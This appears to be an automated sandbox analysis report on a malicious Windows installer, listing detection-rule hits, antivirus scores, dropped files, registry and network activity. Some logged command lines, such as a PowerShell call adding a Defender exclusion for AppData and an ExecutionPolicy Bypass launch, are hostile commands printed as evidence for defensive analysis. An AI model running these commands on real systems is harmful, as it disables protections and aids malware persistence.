            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 061CED878CF19ABE4346D43116706A13, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7068, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5152, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 061CED878CF19ABE4346D43116706A13, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7068, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5152, ProcessName: powershell.exe
            Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 061CED878CF19ABE4346D43116706A13, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7068, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5152, ProcessName: powershell.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.199.110.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3992, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49711
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force", CommandLine: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5C5C.tmp\5C5D.tmp\5C5E.bat C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1488, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\user\Appdata\Local" -Force", ProcessId: 396, ProcessName: powershell.exe
            Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 061CED878CF19ABE4346D43116706A13, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7068, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5152, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 061CED878CF19ABE4346D43116706A13, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7068, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC38A.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC368.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC369.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC36A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5152, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6912, ProcessName: svchost.exe
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\networkbroker.exeReversingLabs: Detection: 28%
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeReversingLabs: Detection: 30%
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeReversingLabs: Detection: 33%
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeReversingLabs: Detection: 79%
            Source: JWQgbclQK5ReversingLabs: Detection: 69%
            Source: JWQgbclQK5Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\License.txt
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\LICENSE.txt
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\LICENSE-MIT.txt
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\wrap-ansi\node_modules\emoji-regex\LICENSE-MIT.txt
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\readme.txt
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: C:\Windows\System32\msiexec.exeFile opened: z:
            Source: C:\Windows\System32\msiexec.exeFile opened: x:
            Source: C:\Windows\System32\msiexec.exeFile opened: v:
            Source: C:\Windows\System32\msiexec.exeFile opened: t:
            Source: C:\Windows\System32\msiexec.exeFile opened: r:
            Source: C:\Windows\System32\msiexec.exeFile opened: p:
            Source: C:\Windows\System32\msiexec.exeFile opened: n:
            Source: C:\Windows\System32\msiexec.exeFile opened: l:
            Source: C:\Windows\System32\msiexec.exeFile opened: j:
            Source: C:\Windows\System32\msiexec.exeFile opened: h:
            Source: C:\Windows\System32\msiexec.exeFile opened: f:
            Source: C:\Windows\System32\msiexec.exeFile opened: b:
            Source: C:\Windows\System32\msiexec.exeFile opened: y:
            Source: C:\Windows\System32\msiexec.exeFile opened: w:
            Source: C:\Windows\System32\msiexec.exeFile opened: u:
            Source: C:\Windows\System32\msiexec.exeFile opened: s:
            Source: C:\Windows\System32\msiexec.exeFile opened: q:
            Source: C:\Windows\System32\msiexec.exeFile opened: o:
            Source: C:\Windows\System32\msiexec.exeFile opened: m:
            Source: C:\Windows\System32\msiexec.exeFile opened: k:
            Source: C:\Windows\System32\msiexec.exeFile opened: i:
            Source: C:\Windows\System32\msiexec.exeFile opened: g:
            Source: C:\Windows\System32\msiexec.exeFile opened: e:
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
            Source: C:\Windows\System32\msiexec.exeFile opened: a:
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build\lib
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui

            Networking

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: raw.githubusercontent.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.16:49711 version: TLS 1.2

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeFile dump: SurrogateServerIntoSvc.exe.35.dr 253000000Jump to dropped file
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\40c089.msi
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC210.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC26F.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC28F.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC2BF.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC2DF.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC30F.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF839.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF869.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF889.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C}
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI963.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI964.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9B3.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F3.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA22.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBC9.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC28.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC48.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI12E1.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1311.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20CD.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\40c08c.msi
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\40c08c.msi
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI551D.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI554D.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBF81.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBF92.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBFC2.tmp
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC2C0.tmp
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIC210.tmp
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: acgenral.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: winmm.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: samcli.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: msacm32.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: urlmon.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: mpr.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: winmmbase.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: winmmbase.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: iertutil.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: netutils.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: aclayers.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: sfc.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: textshaping.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: iconcodecservice.dll
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeSection loaded: windowscodecs.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
